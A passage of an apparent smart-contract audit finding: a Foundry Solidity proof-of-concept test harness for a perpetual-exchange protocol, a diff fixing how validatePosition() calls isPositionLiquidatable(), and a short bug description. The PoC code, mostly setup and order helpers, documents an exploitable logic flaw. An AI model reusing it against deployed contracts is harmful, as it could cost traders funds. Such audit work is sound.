18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(""SIGNATURE"");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n 
priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n 
params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n 
params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n 
params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower 
effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with 
this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createWithdraw with withdrawor: "");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory 
longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createDeposit with depositor: "");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(""000000000000000000"");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(""bbbbbbbbbbbbbbbbbbbbbb"");\\n }\\n else {\\n console2.log(""111111111111111111111111"");\\n console2.log(""deposit balance: %d, %d"", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(""qqqqqqqqqqqqqqqqqq"");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(""aaaaaaaaaaaaaaaaaaaaaaaaa"");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}("""");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(""WNT balance of address(222) before cancelllation: %s"", 
_wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) before cancelllation: %s"", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(""WNT balance of address(222) after cancelllation: %s"", _wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) after cancelllation: %s"", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(""wnt suppports deposit?"");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(""_wnt supports ERC165"");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(""_sol supports ERC165"");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(""abcdefg""); // 973d02cb\\n // revert(""abcdefg""); // 0x08c379a, Error selector\\n // require(false, ""abcdefg""); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(""Error Message: ""); console2.logString(msg);\\n console2.log(""error?""); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(""_orderVault:""); console2.logAddress(address(_orderVault));\\n console2.log(""marketToken:""); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(""\\n The summary of pool amounts: "");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n 
console2.log(""Market: _marketProps1, token: long/nwt, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(""Market: _marketProps1, token: short/USDC, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(""Market: _marketPropsAB, token: long/A, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(""Market: _marketPropsAB, token: short/B, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(""Market: _marketPropsBC, token: long/B, amount:%d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(""Market: _marketPropsBC, token: short/C, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(""Market: _marketPropsCwnt, token: long/C, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(""Market: _marketPropsCwnt, token: short/wnt, amount: %d"", amount);\\n \\n\\n console2.log(""\\n"");\\n }\\n \\n}\\n```\\n","Pass false always to isPositionLiquidatable():\\n```\\n function validatePosition(\\n DataStore dataStore,\\n IReferralStorage referralStorage,\\n Position.Props memory position,\\n Market.Props memory market,\\n MarketUtils.MarketPrices memory prices,\\n bool isIncrease,\\n bool shouldValidateMinPositionSize,\\n bool shouldValidateMinCollateralUsd\\n ) public view {\\n if (position.sizeInUsd() == 0 || position.sizeInTokens() == 0) {\\n revert Errors.InvalidPositionSizeValues(position.sizeInUsd(), position.sizeInTokens());\\n }\\n\\n MarketUtils.validateEnabledMarket(dataStore, market.marketToken);\\n 
MarketUtils.validateMarketCollateralToken(market, position.collateralToken());\\n\\n if (shouldValidateMinPositionSize) {\\n uint256 minPositionSizeUsd = dataStore.getUint(Keys.MIN_POSITION_SIZE_USD);\\n if (position.sizeInUsd() < minPositionSizeUsd) {\\n revert Errors.MinPositionSize(position.sizeInUsd(), minPositionSizeUsd);\\n }\\n }\\n\\n if (isPositionLiquidatable(\\n dataStore,\\n referralStorage,\\n position,\\n market,\\n prices,\\n// Remove the line below\\n isIncrease,\\n// Add the line below\\n false,\\n shouldValidateMinCollateralUsd\\n )) {\\n revert Errors.LiquidatablePosition();\\n }\\n }\\n```\\n","PositionUtils.validatePosition() uses `isIncrease` instead of `false` when calling isPositionLiquidatable(), making it not work properly for the case of `isIncrease` = true. A liquidation should always be considered as a decrease order in terms of evaluating price impact.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../contracts/role/RoleStore.sol"";\\nimport ""../contracts/router/ExchangeRouter.sol"";\\nimport ""../contracts/data/DataStore.sol"";\\nimport ""../contracts/referral/ReferralStorage.sol"";\\n\\nimport ""../contracts/token/IWNT.sol"";\\nimport ""../contracts/token/WNT.sol"";\\nimport ""../contracts/token/SOLToken.sol"";\\nimport ""../contracts/token/USDC.sol"";\\nimport ""../contracts/token/tokenA.sol"";\\nimport ""../contracts/token/tokenB.sol"";\\nimport ""../contracts/token/tokenC.sol"";\\n\\nimport ""../contracts/market/MarketFactory.sol"";\\nimport ""../contracts/deposit/DepositUtils.sol"";\\nimport ""../contracts/oracle/OracleUtils.sol"";\\nimport ""@openzeppelin/contracts/utils/introspection/ERC165Checker.sol"";\\nimport ""../contracts/withdrawal/WithdrawalUtils.sol"";\\nimport ""../contracts/order/Order.sol"";\\nimport ""../contracts/order/BaseOrderUtils.sol"";\\nimport ""../contracts/price/Price.sol"";\\nimport ""../contracts/utils/Debug.sol"";\\nimport 
""../contracts/position/Position.sol"";\\nimport ""../contracts/exchange/LiquidationHandler.sol"";\\nimport ""../contracts/utils/Calc.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SignedMath.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new 
EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(""_oracle:""); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(""_depositHandler:""); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(""_erouter:""); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, 
WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(""_marketFactory:""); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(""sol-wnt-usdc""))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(""swap-tokenA-tokenB""))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(""swap-tokenB-tokenC""))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(""swap-tokenC-wnt""))); \\n \\n \\n 